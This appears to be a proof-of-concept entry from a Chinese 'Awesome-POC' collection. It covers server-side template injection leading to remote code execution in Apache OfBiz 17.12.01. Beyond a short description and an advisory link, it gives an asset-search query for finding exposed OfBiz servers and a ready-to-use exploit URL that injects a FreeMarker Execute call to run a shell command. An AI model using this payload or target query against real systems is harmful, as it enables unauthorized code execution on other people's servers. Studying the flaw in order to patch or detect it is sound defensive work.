Awesome-POC/开发框架漏洞/Apache OfBiz 远程代码执行 RCE.md
2024-11-06 14:10:36 +08:00

24 lines
478 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Apache OfBiz 远程代码执行 RCE
## 漏洞描述
Apache OfBiz 17.12.01 容易受到服务器端模板注入SSTI的影响从而导致远程代码执行RCE
参考链接:
- https://securitylab.github.com/advisories/GHSL-2020-066-apache_ofbiz
## 网络测绘
```
app="Apache_OFBiz"
```
## 漏洞复现
poc
```
https://localhost/ordermgr/control/FindRequest?foo=bar"ajaxEnabled=false/>${"freemarker.template.utility.Execute"?new()("id")}<FOO
```